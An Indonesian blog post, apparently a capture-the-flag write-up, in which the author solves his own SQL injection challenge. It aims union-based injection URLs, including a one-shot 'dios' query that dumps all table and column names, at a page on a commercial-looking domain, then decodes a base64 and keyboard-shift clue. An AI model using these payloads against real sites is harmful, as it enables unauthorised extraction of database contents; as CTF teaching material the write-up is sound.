Write Up My SQL Injection CTF Challenge

Write Up My SQL Injection CTF Challenge


label
label
label
Hai guys... kawaii gak? :D oshimen ini
Gue yg vvota turut berduka cita atas meninggalnya Inao Jiro a.k.a Jiro-San
Yo langsung aja yak.. Jadi gini guys kemaren itu gue membuat SQL Injection CTF challenge yg gue post di grup IndoXploit, berikut penampakannya
 
Yo langsung aja buka linknya di sini
kemudian tambahkan '+order+by+1--+

http://www.excellentexporters.biz/page.php?id=2'+order+by+1--+  -> no error



http://www.excellentexporters.biz/page.php?id=2'+order+by+2--+  -> no error
http://www.excellentexporters.biz/page.php?id=2'+order+by+3--+  -> no error
http://www.excellentexporters.biz/page.php?id=2'+order+by+4--+  -> error

Selanjutnya kita masukan perintah - sebelum parameter angka dan '+union+all+select+1,2,3-- setelah parameter angka, karena errornya di nomer 4 maka saat union select hanya nomer yg tidak error.

http://www.excellentexporters.biz/page.php?id=-2'+union+all+select+1,2,3--+

Angka ajaib pun keluar :'v


 Di situ muncul angka yg muncul adalah angka 2 dan 3, langsung aja pake dios
(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)
Di sini gue masukkan di angka 3, jadinya 

http://www.excellentexporters.biz/page.php?id=-2'+union+all+select+1,2,select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)--+

 Muncul semua tuh table dan columnnya, di situ terdapat table flagnya dan column di_kolom_ini, langsung saja cari tau isi columnnya dengan mengganti dios dengan group_concat(di_kolom_ini)+from+flagnya 

http://www.excellentexporters.biz/page.php?id=-2'+union+all+select+1,2,group_concat(di_kolom_ini)+from+flagnya--+

Boom!! muncullah isi columnnya, tapi tunggu dulu.... di situ terdapat sebuah teks biasa, dan sebuah base64 encode, langsung aja didecode di sini


Dan ternyata kita menemukan clue baru yaitu mundur 3 langkah, clue pertama adalah keyboard.. jadi di keyboard mundur 3 langkah jadinya seperti ini 
Taraaa!! Selesai sudah write upnya :''v 

Sekian dari gue Mr. 1334N
*Bila ingin copas mohon sertakan sumber :) terimakasih
Thanks to all member Cyrus Cyber, Indoxploit, and All Solver :) 

Share This :
Unknown

comment 2 comments:

more_vert
avatar
Unknown person

Kok gk nyambung bro, dari clue kok tiba tiba jadi : noupgjdfk , dari keyboard aja 8digit ko jadi > noupgjdfk (9digit)

delete March 24, 2017 at 11:31 AM
Balas
avatar
Unknown person

bukan gitu bro maksudnya, tombol di keyboard kan qwertyuiop blablabla... nah itu huruf n mundur 3 langkah jadinya
dari n kemudian b kemudian v kemudian c
begitu juga yg lainnya, kalo untuk d, mundur 3 langkahnya
dari d kemudian s kemudian a kemudian jadi l

delete March 26, 2017 at 7:50 PM
Balas

*Komentar Dengan Sopan !
*Jangan OOT ^_^

sentiment_satisfied Emoticon